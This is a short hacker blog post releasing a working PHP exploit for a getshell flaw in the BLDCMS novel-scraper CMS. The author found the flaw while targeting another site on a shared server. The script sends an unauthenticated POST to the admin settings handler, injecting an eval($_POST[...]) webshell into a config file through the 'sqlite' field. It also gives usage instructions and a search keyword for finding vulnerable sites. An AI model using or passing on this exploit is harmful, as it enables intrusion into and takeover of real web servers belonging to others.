A while back I wanted to hit a hacker's site and noticed a neighbouring site on the same server running BLDCMS, so I downloaded it and had a look... and found a getshell vulnerability.

Funny thing: last night 晴天小铸 spotted that someone had already posted an analysis of this getshell vulnerability on 90sec. Damn, beaten to it.

Since it's out anyway, I'll release the EXP I wrote earlier.
<?php
// Usage: php.exe EXP.php <host> <dir> <pass>
echo "-------------------------------------------------------------------------------\r\n"
   . " BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP (GPC=Off)\r\n"
   . " Vulnerability discovery&Code by 数据流@wooyun QQ:981009941\r\n 2013.3.21\r\n"
   . "\r\n 用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码)\r\n"
   . " 搜索关键字:\"开发者: 白老大小说\"\r\n"
   . "-------------------------------------------------------------------------------\r\n";
$url  = $argv[1];
$dir  = $argv[2];
$pass = $argv[3];
// Value sent in the "sqlite" setting: closes the quoted literal and appends an eval() call
$eval = '\';eval($_POST['.'"'.$pass.'"'.']);\'';
if (empty($pass) || empty($url)) {
    exit("请输入参数");
} else {
    $fuckdata = 'sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite=' . $eval;
    $length   = strlen($fuckdata);

    function getshell($url, $pass)
    {
        global $url, $dir, $pass, $eval, $length, $fuckdata;
        // Raw HTTP request to the settings handler, written to a plain socket
        $header  = "POST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
        $header .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $header .= "User-Agent: MSIE\r\n";
        $header .= "Host:" . $url . "\r\n";
        $header .= "Content-Length: " . $length . "\r\n";
        $header .= "Connection: Close\r\n";
        $header .= "\r\n";
        $header .= $fuckdata . "\r\n\r\n";
        $fp = fsockopen($url, 80, $errno, $errstr, 15);
        if (!$fp) {
            exit("利用失败:请检查指定目标是否能正常打开");
        } else {
            if (!fputs($fp, $header)) {
                exit("利用失败");
            } else {
                // Drain the response before closing the socket
                $receive = '';
                while (!feof($fp)) {
                    $receive .= @fgets($fp, 1000);
                }
                @fclose($fp);
                echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标GPC是否=off)";
            }
        }
    }
    getshell($url, $pass);
}
?>

by 数据流